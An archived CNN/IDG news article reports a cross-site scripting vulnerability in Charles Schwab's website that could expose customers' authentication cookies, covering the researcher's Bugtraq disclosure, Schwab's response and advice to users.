TECHNOLOGY
TOP STORIES

Consumer group: Online privacy protections fall short

Guide to a wired Super Bowl

Debate opens on making e-commerce law consistent

(MORE)

BUSINESS
Playing for Iraq's jackpot

Coke & smoke bite Dow

Sun Microsystems posts tiny profit

(MORE)

MARKETS	4:30pm ET, 4/16
DJIA	144.70	8257.60
NAS	3.71	1394.72
S&P	10.90	879.91

SPORTS
Jordan says farewell for the third time

Shaq could miss playoff game for child's birth

Ex-USOC official says athletes bent drug rules

(MORE)

All Scoreboards

WORLD

Quake help not fast enough, says Indian PM

U.S.

Bush: No help from Washington for California power crunch

POLITICS

Bush signs order opening 'faith-based' charity office for business

LAW

Prosecutor says witnesses saw rap star shoot gun in club

ENTERTAINMENT

Can the second 'Survivor' live up to the first?

HEALTH

Heart doctors debate ethics of testing super-aspirin

TRAVEL

Nurses to aid ailing airline passengers

FOOD

Texas cattle quarantined after violation of mad-cow feed ban

ARTS & STYLE

Ceramist Adler adds furniture to his creations

(MORE HEADLINES)

MAINPAGE WORLD U.S. WEATHER BUSINESS SPORTS

TECHNOLOGY

computing personal technology

SPACE HEALTH ENTERTAINMENT POLITICS LAW CAREER TRAVEL FOOD ARTS & STYLE BOOKS NATURE IN-DEPTH ANALYSIS LOCAL
EDITIONS:
CNN.com Europe change default edition
MULTIMEDIA:
video video archive audio multimedia showcase more services

E-MAIL:

Subscribe to one of our news e-mail lists.
Enter your address:

DISCUSSION:

chat
feedback

CNN WEB SITES:

CNNfyi.com
CNN.com Europe
AsiaNow
Spanish
Portuguese
German
Italian
Danish
Japanese
Chinese Headlines
Korean Headlines

TIME INC. SITES:

CNN NETWORKS:

CNN anchors
transcripts
Turner distribution

SITE INFO:

help
contents
search
ad info
jobs

WEB SERVICES:

Schwab's site could be vulnerable

From...

By Elinor Abreu

(IDG) -- Charles Schwab's online customers are at risk of having their account information accessed and their accounts manipulated due to the same software vulnerability that affected E-Trade's Web site in September.

Both online brokers are highly susceptible to so-called cross-site scripting, a common flaw found in Web-based applications that allows a browser to be tricked into performing an execution that the user did not intend.

MESSAGE BOARD

Security on the Net

In the Schwab case, an attacker could use JavaScript to gain control of another Schwab customer account while the user is online, and could retrieve the cookie that Schwab employs for user authentication, according to Jeffrey W. Baker, who posted the vulnerability on the Bugtraq security mailing list Monday. The security flaw also opens the possibility of an attacker figuring out a customer's login cookie.

"The attacker can choose to either gain interactive use of the service, or to cause the account holder to perform inadvertent unwanted actions on the attacker's behalf," Baker writes.

IDG.net INFOCENTER
- IDG.net Multimedia & Leisure page
- Free daily newsletter for tech-savvy professionals
- Get instant answers from the Dummies Network
- Computerworld Communities
Related IDG.net Stories
Asian governments commit to universal Internet access
Chicago moves to build metropolitan-area network
It takes an e-village
Features
- Scholars: e-mail reveals 'language of love'
- Tech skills help blend work, home lives
- Getting a degree from inside a cubicle
Visit an IDG site

IDG.net search

Schwab customers can become vulnerable to the exploit merely by clicking on a Web page link, or on an image embedded in an e-mail or a message on a stock trading bulletin board.

Baker was critical of the way Schwab has handled -- or rather not handled, in his opinion -- the problem. He said he discovered the security flaws in August and that despite having discussions with Schwab staff about them from Aug. 25 to Aug. 28, the problem has not been resolved.

"As an organization, Schwab should strive to fix problems when given five-month advance notice," he writes. "They should raise their ethical standards to alert their paying customers whenever a system vulnerability is reported."

Elias Levy, CTO of the SecurityFocus.com portal and moderator of the Bugtraq mailing list, says the vulnerability is the result of poor programming practices.

Schwab spokesman John Sommerfield said the brokerage has taken "intermediate" steps to correct the problem, though he declined to specify what those steps are. The company will have a complete fix for the problem by the end of the year, he says, adding that no incidents have been reported and that the risk is "relatively minimal" for customers.

"In order for someone to attack you as a Schwab customer, the hacker must know you're a customer and [that you are] logged on," Sommerfield says. "Also, the hacker must know the customer's e-mail address."

Baker recommends that Schwab customers disable JavaScript in their browsers and that they not visit any other Web sites, read e-mail or use bulletin boards while using Schwab's Web site. He also warns that Schwab customers should log off the Schwab site when they are finished using it, and always close and restart their browser before and after using the Web site.

In September, Baker reported on Bugtraq the same scripting problem at E-Trade, in hopes of spurring the brokerage to take action. A call to an E-Trade spokeswoman to find out if the cross-site scripting vulnerability has been fixed was not immediately returned Wednesday evening.

The cross-site scripting problem first came to light in February when experts at CERT, the Computer Emergency Response Team at Carnegie Mellon University, released an advisory. In general, Web users are advised not to open e-mail messages or click on Web links that aren't from trusted sources.